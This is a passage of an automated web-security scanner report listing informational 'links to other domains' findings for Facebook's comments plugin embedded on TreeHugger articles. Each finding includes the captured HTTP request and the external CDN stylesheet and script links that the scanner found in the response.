<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/rvK2wZMiBgl.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yO/r/F4fS63UxgpV.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yu/r/MatpvpYmg_x.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/F56NTl3Vdyk.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/-zTzCY4nRsr.js"></script>
<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yp/r/XJ-mTyMG8hy.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/jbHiQwYzYKQ.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/TreeHugger" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50412_17890180291_5773186_q.jpg" alt="TreeHugger" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/annmarie.r.greenberg" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195522_1238529586_5979087_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001541848680" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273997_100001541848680_682388_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203281_828264991_3228244_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001834130658" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273470_100001834130658_3506797_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/irishleyros" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195295_100001660921957_793145_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/esther.bourgault1" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211515_631263271_7135587_q.jpg" alt="" /><div class="name">
...[SNIP]...

18.137. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/silverback-gorilla-takes-close-up-video-of-himself-with-toy-camera-video.php&permalink=1

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://www.treehugger.com/files/2011/07/silverback-gorilla-takes-close-up-video-of-himself-with-toy-camera-video.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/silverback-gorilla-takes-close-up-video-of-himself-with-toy-camera-video.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.138. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/mass-extinctions-easier-to-trigger.php&permalink=1

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yf/r/Pa_Xph4w3wq.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yu/r/MatpvpYmg_x.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/F56NTl3Vdyk.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/rvK2wZMiBgl.css
http://www.treehugger.com/files/2011/07/mass-extinctions-easier-to-trigger.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/mass-extinctions-easier-to-trigger.php&permalink=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

18.139. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?api_key=133255656700169&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df189a0d488%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&locale=en_US&numposts=10&sdk=joey&width=468

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/C0OtqEd7THh.css
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js

Request

GET /plugins/comments.php?api_key=133255656700169&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df189a0d488%26origin%3Dhttp%253A%252F%252Fwww.treehugger.com%252Ff135c372b4%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.treehugger.com%2Ffiles%2F2011%2F07%2Fsea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php&locale=en_US&numposts=10&sdk=joey&width=468 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.140. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/italy-now-second-place-world-solar-pv.php&permalink=1

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yf/r/Pa_Xph4w3wq.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yu/r/MatpvpYmg_x.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/F56NTl3Vdyk.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/rvK2wZMiBgl.css
http://www.treehugger.com/files/2011/07/italy-now-second-place-world-solar-pv.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/italy-now-second-place-world-solar-pv.php&permalink=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

18.141. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/bbc-skeptics-too-much-air-time.php&permalink=1

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yf/r/Pa_Xph4w3wq.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yu/r/MatpvpYmg_x.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/F56NTl3Vdyk.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/rvK2wZMiBgl.css
http://www.treehugger.com/files/2011/07/bbc-skeptics-too-much-air-time.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/bbc-skeptics-too-much-air-time.php&permalink=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

18.142. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/mass-extinctions-easier-to-trigger.php&permalink=1

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://www.treehugger.com/files/2011/07/mass-extinctions-easier-to-trigger.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/mass-extinctions-easier-to-trigger.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.143. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/bbc-skeptics-too-much-air-time.php&permalink=1

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://www.treehugger.com/files/2011/07/bbc-skeptics-too-much-air-time.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/bbc-skeptics-too-much-air-time.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.144. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&permalink=1

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yf/r/Pa_Xph4w3wq.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yu/r/MatpvpYmg_x.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/F56NTl3Vdyk.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/rvK2wZMiBgl.css
http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&permalink=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

18.145. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/ted-talk-jonathan-drori-on-tricks-flowers-play-on-pollinators.php&permalink=1

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://www.treehugger.com/files/2011/07/ted-talk-jonathan-drori-on-tricks-flowers-play-on-pollinators.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/ted-talk-jonathan-drori-on-tricks-flowers-play-on-pollinators.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.146. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/week-animal-news-terrifying-toothy-sea-worms-saving-sea-turtles-slideshow.php&permalink=1

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://www.treehugger.com/files/2011/07/week-animal-news-terrifying-toothy-sea-worms-saving-sea-turtles-slideshow.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/week-animal-news-terrifying-toothy-sea-worms-saving-sea-turtles-slideshow.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.147. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/cool-off-with-most-beautiful-waves-ever-slideshow.php&permalink=1

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://www.treehugger.com/files/2011/07/cool-off-with-most-beautiful-waves-ever-slideshow.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/cool-off-with-most-beautiful-waves-ever-slideshow.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.148. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/mountaintop-removal-solar-power.php&permalink=1

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://www.treehugger.com/files/2011/07/mountaintop-removal-solar-power.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/mountaintop-removal-solar-power.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.149. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/how-latest-heatwave-isnt-like-ones-weve-had-in-past.php&permalink=1

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://www.treehugger.com/files/2011/07/how-latest-heatwave-isnt-like-ones-weve-had-in-past.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/how-latest-heatwave-isnt-like-ones-weve-had-in-past.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.150. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/worlds-largest-solar-farm-usa.php&permalink=1

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://b.static.ak.fbcdn.net/rsrc.php/v1/yf/r/Pa_Xph4w3wq.css
http://b.static.ak.fbcdn.net/rsrc.php/v1/yu/r/MatpvpYmg_x.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/F56NTl3Vdyk.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/rvK2wZMiBgl.css
http://www.treehugger.com/files/2011/07/worlds-largest-solar-farm-usa.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/worlds-largest-solar-farm-usa.php&permalink=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

18.151. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/worlds-largest-solar-farm-usa.php&permalink=1

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://www.treehugger.com/files/2011/07/worlds-largest-solar-farm-usa.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/worlds-largest-solar-farm-usa.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.152. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/pollution-in-paradise-turkey-oludeniz-at-risk.php&permalink=1

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/cNiPtQXsNfj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/lIE6LBGZUrP.css
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/e0OzuKrROTf.css
http://www.treehugger.com/files/2011/07/pollution-in-paradise-turkey-oludeniz-at-risk.php

Request

GET /plugins/comments.php?href=http://www.treehugger.com/files/2011/07/pollution-in-paradise-turkey-oludeniz-at-risk.php&permalink=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

18.153. http://www.facebook.com/plugins/comments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/comments.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/another-reason-we-need-the-smart-grid-record-heat.php&permalink=1

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/y4/r/eXHcpRoThZn.js
